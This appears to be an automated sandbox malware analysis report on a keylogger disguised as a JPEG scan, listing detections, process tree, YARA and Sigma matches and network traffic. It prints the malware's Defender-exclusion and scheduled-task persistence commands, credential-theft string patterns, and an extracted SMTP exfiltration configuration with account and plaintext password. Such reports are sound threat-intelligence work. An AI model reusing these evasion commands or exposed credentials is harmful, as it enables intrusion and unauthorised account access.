Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe

Overview

General Information

Sample name:Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Analysis ID:1541880
MD5:52f14c343d0b2ec1426e775c6b6569ff
SHA1:5c61b57a86c14de578f2425773f190da35be62e2
SHA256:5994cf17202884f994b3e294fca7cd9c2847b6c98a0bdb5e65cf164f830197a9
Tags:exeMassLoggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe (PID: 5824 cmdline: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe" MD5: 52F14C343D0B2EC1426E775C6B6569FF)
    • powershell.exe (PID: 4268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7200 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4548 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • HJnkiZjAPsec.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe MD5: 52F14C343D0B2EC1426E775C6B6569FF)
    • schtasks.exe (PID: 7400 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HJnkiZjAPsec.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe" MD5: 52F14C343D0B2EC1426E775C6B6569FF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "skisubi@kafs.co.ug", "Password": "B24AM5D9X9F3ZPN", "Host": "mail.kafs.co.ug", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "skisubi@kafs.co.ug", "Password": "B24AM5D9X9F3ZPN", "Host": "mail.kafs.co.ug", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 26 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x3ad12:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x3a3b5:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x3a612:$a4: \Orbitum\User Data\Default\Login Data
            • 0x3aff1:$a5: \Kometa\User Data\Default\Login Data
            8.2.HJnkiZjAPsec.exe.47369f0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.HJnkiZjAPsec.exe.47369f0.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                8.2.HJnkiZjAPsec.exe.47369f0.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  8.2.HJnkiZjAPsec.exe.47369f0.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2b859:$a1: get_encryptedPassword
                  • 0x2be05:$a2: get_encryptedUsername
                  • 0x2b4be:$a3: get_timePasswordChanged
                  • 0x2b5e3:$a4: get_passwordField
                  • 0x2b86f:$a5: set_encryptedPassword
                  • 0x2e5c9:$a6: get_passwords
                  • 0x2e974:$a7: get_logins
                  • 0x2e5b5:$a8: GetOutlookPasswords
                  • 0x2df6e:$a9: StartKeylogger
                  • 0x2e8b6:$a10: KeyLoggerEventArgs
                  • 0x2e00e:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 45 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ParentProcessId: 5824, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", ProcessId: 4268, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ParentProcessId: 5824, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", ProcessId: 4268, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe, ParentImage: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe, ParentProcessId: 7260, ParentProcessName: HJnkiZjAPsec.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp", ProcessId: 7400, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.243.33.38, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, Initiated: true, ProcessId: 1260, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49779
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ParentProcessId: 5824, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", ProcessId: 4548, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ParentProcessId: 5824, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", ProcessId: 4268, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ParentProcessId: 5824, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", ProcessId: 4548, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-25T09:18:06.504984+020028033053Unknown Traffic192.168.2.449738188.114.97.3443TCP
                  2024-10-25T09:18:09.405582+020028033053Unknown Traffic192.168.2.449745188.114.97.3443TCP
                  2024-10-25T09:18:10.513519+020028033053Unknown Traffic192.168.2.449747188.114.97.3443TCP
                  2024-10-25T09:18:10.896570+020028033053Unknown Traffic192.168.2.449748188.114.97.3443TCP
                  2024-10-25T09:18:11.993731+020028033053Unknown Traffic192.168.2.449751188.114.97.3443TCP
                  2024-10-25T09:18:12.481315+020028033053Unknown Traffic192.168.2.449752188.114.97.3443TCP
                  2024-10-25T09:18:16.714838+020028033053Unknown Traffic192.168.2.449761188.114.97.3443TCP
                  2024-10-25T09:18:18.216321+020028033053Unknown Traffic192.168.2.449767188.114.97.3443TCP
                  2024-10-25T09:18:19.178788+020028033053Unknown Traffic192.168.2.449771188.114.97.3443TCP
                  2024-10-25T09:18:21.689635+020028033053Unknown Traffic192.168.2.449775188.114.97.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-25T09:18:04.545506+020028032742Potentially Bad Traffic192.168.2.449735193.122.130.080TCP
                  2024-10-25T09:18:05.889523+020028032742Potentially Bad Traffic192.168.2.449735193.122.130.080TCP
                  2024-10-25T09:18:07.389273+020028032742Potentially Bad Traffic192.168.2.449740193.122.130.080TCP
                  2024-10-25T09:18:08.186206+020028032742Potentially Bad Traffic192.168.2.449742193.122.130.080TCP
                  2024-10-25T09:18:08.779937+020028032742Potentially Bad Traffic192.168.2.449743193.122.130.080TCP
                  2024-10-25T09:18:09.889320+020028032742Potentially Bad Traffic192.168.2.449742193.122.130.080TCP
                  2024-10-25T09:18:11.264267+020028032742Potentially Bad Traffic192.168.2.449749193.122.130.080TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeAvira: detection malicious, Label: HEUR/AGEN.1304549
                  Found malware configuration
                  Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "skisubi@kafs.co.ug", "Password": "B24AM5D9X9F3ZPN", "Host": "mail.kafs.co.ug", "Port": "587", "Version": "4.4"}
                  Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "skisubi@kafs.co.ug", "Password": "B24AM5D9X9F3ZPN", "Host": "mail.kafs.co.ug", "Port": "587"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeReversingLabs: Detection: 50%
                  Multi AV Scanner detection for submitted file
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeReversingLabs: Detection: 50%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49770 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0C1CA81Eh0_2_0C1CAFFB
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0122F45Dh6_2_0122F2C0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0122F45Dh6_2_0122F4AC
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0122FC19h6_2_0122F961
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 069131E0h6_2_06912DC8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 06910D0Dh6_2_06910B30
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 06911697h6_2_06910B30
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 06912C19h6_2_06912968
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691E959h6_2_0691E6B0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691E0A9h6_2_0691DE00
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_06910673
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691F209h6_2_0691EF60
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691CF49h6_2_0691CCA0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 069131E0h6_2_06912DC3
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691D7F9h6_2_0691D550
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691E501h6_2_0691E258
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691F661h6_2_0691F3B8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691EDB1h6_2_0691EB08
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691D3A1h6_2_0691D0F8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691FAB9h6_2_0691F810
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_06910853
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_06910040
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 0691DC51h6_2_0691D9A8
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 4x nop then jmp 069131E0h6_2_0691310E
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 029EF45Dh11_2_029EF2C0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 029EF45Dh11_2_029EF4AC
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 029EFC19h11_2_029EF961
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 069631E0h11_2_06962DC8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 06960D0Dh11_2_06960B30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 06961697h11_2_06960B30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 06962C19h11_2_06962968
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696E959h11_2_0696E6B0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696E0A9h11_2_0696DE00
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06960673
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696F209h11_2_0696EF60
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696CF49h11_2_0696CCA0
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 069631E0h11_2_06962DC2
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696D7F9h11_2_0696D550
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696E501h11_2_0696E258
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696F661h11_2_0696F3B8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696EDB1h11_2_0696EB08
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696D3A1h11_2_0696D0F8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696FAB9h11_2_0696F810
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06960853
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_06960040
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 0696DC51h11_2_0696D9A8
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeCode function: 4x nop then jmp 069631E0h11_2_0696310E

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.4:49779 -> 104.243.33.38:587
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
